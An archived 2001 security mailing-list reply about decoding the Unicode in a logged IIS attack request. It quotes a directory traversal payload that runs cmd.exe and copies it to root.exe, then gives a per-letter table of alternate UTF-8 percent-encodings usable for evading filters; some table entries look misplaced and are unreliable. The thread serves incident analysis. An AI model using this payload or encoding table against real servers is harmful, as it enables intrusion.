Re: Unicode Decode

From: Roelof (roelofat_private)
Date: Tue Jun 26 2001 - 00:08:47 PDT

  • Next message: Justin Kremer - CEO: "Re: Threat mail from russia (followup)"

    On Mon, 25 Jun 2001, jason wrote:
    
    > Does anyone know of any sites/tools/tables to decode unicode
    > information?  Specificly I am looking to decode the unicode portion
    > of this attack:
    
    > GET
    > /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/sytem32/cmd.exe
    > ?/c+copy+\winnt\system32\cmd.exe +root.exe HTTP/1.0
    
    Jason,
    
    I dont have all the codes (not for the
    !@#$%^*&*(()+_{};'./\,. etc...havent actually got the time to brute it) -
    here is the lowercase (it might help some of others on this list). This
    straight from pudding: (if you are sitting on the codes for the other
    chars - pass them on). Writing a decoder from this is easy.
    
    --utf8.db-------
    a-%41,%61,%c4%80,%c4%81,%c4%82,%c4%83,%c4%84,%c4%85,%c7%8d,%c7%8e,%c7%9e,%c7%9f,%ce%b1,%d
    1%81,%d1%a1,%d4%80,%d4%81,%d4%82,%d4%83,%d4%84,%d4%85,%d7%8d,%d7%8e,%d7%9e,%d7%9f,%de%b1,
    %42
    
    b-%62,%c6%80,%d1%82,%d1%a2,%d6%80
    
    c-%43,%63,%c4%86,%c4%87,%c4%88,%c4%89,%c4%8a,%c4%8b,%c4%8c,%c4%8d,%d1%83,%d1%a3,%d4%86,%d
    4%87,%d4%88,%d4%89,%d4%8a,%d4%8b,%d4%8c,%d4%8d,%e2%84%82,%44
    
    d-%64,%c4%8e,%c4%8f,%c4%91,%ce%b4,%d1%84,%d1%a4,%d4%8e,%d4%8f,%d4%91,%de%b4,%45
    
    e-%65,%c4%92,%c4%93,%c4%94,%c4%95,%c4%96,%c4%97,%c4%98,%c4%99,%c4%9a,%c4%9b,%ce%b5,%d1%85
    ,%d1%a5,%d4%92,%d4%93,%d4%94,%d4%95,%d4%96,%d4%97,%d4%98,%d4%99,%d4%9a,%d4%9b,%de%b5,%e2%
    84%87
    
    f-%46,%66,%ce%a6,%cf%86,%d1%86,%d1%a6,%de%a6,%df%86
    
    g-%47,%67,%c4%9c,%c4%9d,%c4%9e,%c4%9f,%c4%a0,%c4%a1,%c4%a2,%c4%a3,%c7%a4,%c7%a5,%c7%a6,%c
    7%a7,%c9%a1,%ce%93,%d1%87,%d1%a7,%d4%9c,%d4%9d,%d4%9e,%d4%9f,%d4%a0,%d4%a1,%d4%a2,%d4%a3,
    %d7%a4,%d7%a5,%d7%a6,%d7%a7,%d9%a1,%de%93,%e2%84%8a
    
    h-%48,%68,%c4%a4,%c4%a5,%c4%a6,%c4%a7,%d1%88,%d1%a8,%d4%a4,%d4%a5,%d4%a6,%d4%a7,%e2%84%8b
    ,%e2%84%8c,%e2%84%8d,%e2%84%8e,%49
    
    i-%69,%c4%a8,%c4%a9,%c4%aa,%c4%ab,%c4%ac,%c4%ad,%c4%ae,%c4%af,%c4%b0,%c4%b1,%c6%97,%c7%8f
    ,%c7%90,%d1%89,%d1%a9,%d4%a8,%d4%a9,%d4%aa,%d4%ab,%d4%ac,%d4%ad,%d4%ae,%d4%af,%d4%b0,%d4%
    b1,%d6%97,%d7%8f,%d7%90,%e2%84%90,%e2%84%91
    
    j-%4a,%6a,%c4%b4,%c4%b5,%c7%b0,%d1%8a,%d1%aa,%d4%b4,%d4%b5,%d7%b0
    
    k-%4b,%6b,%c4%b6,%c4%b7,%c7%a8,%c7%a9,%d1%8b,%d1%ab,%d4%b6,%d4%b7,%d7%a8,%d7%a9
    
    l-%4c,%6c,%c4%b9,%c4%ba,%c4%bb,%c4%bc,%c4%bd,%c4%be,%c5%81,%c5%82,%c6%9a,%d1%8c,%d1%ac,%d
    4%b9,%d4%ba,%d4%bb,%d4%bc,%d4%bd,%d4%be,%d5%81,%d5%82,%d6%9a,%e2%84%92,%e2%84%93
    
    m-%4d,%6d,%d1%8d,%d1%ad
    
    n-%4e,%6e,%c5%83,%c5%84,%c5%85,%c5%86,%c5%87,%c5%88,%d1%8e,%d1%ae,%d5%83,%d5%84,%d5%85,%d
    5%86,%d5%87,%d5%88,%e2%81%bf,%e2%84%95
    
    o-%4f,%6f,%c5%8c,%c5%8d,%c5%8e,%c5%8f,%c5%90,%c5%91,%c6%9f,%c6%a0,%c6%a1,%c7%91,%c7%92,%c
    7%aa,%c7%ab,%c7%ac,%c7%ad,%ce%a9,%d1%8f,%d1%af,%d5%8c,%d5%8d,%d5%8e,%d5%8f,%d5%90,%d5%91,
    %d6%9f,%d6%a0,%d6%a1,%d7%91,%d7%92,%d7%aa,%d7%ab,%d7%ac,%d7%ad,%de%a9
    
    p-%50,%70,%cf%80,%d1%90,%d1%b0,%df%80,%e2%82%a7,%e2%84%98,%e2%84%99
    
    q-%51,%71,%d1%91,%d1%b1,%e2%84%9a,%52
    
    r-%72,%c5%94,%c5%95,%c5%96,%c5%97,%c5%98,%c5%99,%d1%92,%d1%b2,%d5%94,%d5%95,%d5%96,%d5%97
    ,%d5%98,%d5%99,%e2%84%9b,%e2%84%9c,%e2%84%9d,%53
    
    s-%73,%c5%9a,%c5%9b,%c5%9c,%c5%9d,%c5%9e,%c5%9f,%ce%a3,%cf%83,%d1%93,%d1%b3,%d5%9a,%d5%9b
    ,%d5%9c,%d5%9d,%d5%9e,%d5%9f,%de%a3,%df%83
    
    t-%54,%74,%c5%a2,%c5%a3,%c5%a4,%c5%a5,%c5%a6,%c5%a7,%c6%ab,%c6%ae,%ce%98,%cf%84,%d1%94,%d
    1%b4,%d5%a2,%d5%a3,%d5%a4,%d5%a5,%d5%a6,%d5%a7,%d6%ab,%d6%ae,%de%98,%df%84
    
    u-%55,%75,%c5%a8,%c5%a9,%c5%aa,%c5%ab,%c5%ac,%c5%ad,%c5%ae,%c5%af,%c5%b0,%c5%b1,%c5%b2,%c
    5%b3,%c6%af,%c6%b0,%c7%93,%c7%94,%c7%95,%c7%96,%c7%97,%c7%98,%c7%99,%c7%9a,%c7%9b,%c7%9c,
    %d1%95,%d1%b5,%d5%a8,%d5%a9,%d5%aa,%d5%ab,%d5%ac,%d5%ad,%d5%ae,%d5%af,%d5%b0,%d5%b1,%d5%b
    2,%d5%b3,%d6%af,%d6%b0,%d7%93,%d7%94,%d7%95,%d7%96,%d7%97,%d7%98,%d7%99,%d7%9a,%d7%9b,%d7
    %9c,%56
    
    v-%76,%d1%96,%d1%b6
    
    w-%57,%77,%c5%b4,%c5%b5,%d1%97,%d1%b7,%d5%b4,%d5%b5
    
    x-%58,%78,%d1%98,%d1%b8
    
    y-%59,%79,%c5%b6,%c5%b7,%d1%99,%d1%b9,%d5%b6,%d5%b7
    
    z-%5a,%7a,%c5%b9,%c5%ba,%c5%bb,%c5%bc,%c6%b6,%d1%9a,%d1%ba,%d5%b9,%d5%ba,%d5%bb,%d5%bc,%d
    6%b6,%e2%84%a4,%e2%84%a8,
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Jun 27 2001 - 17:35:56 PDT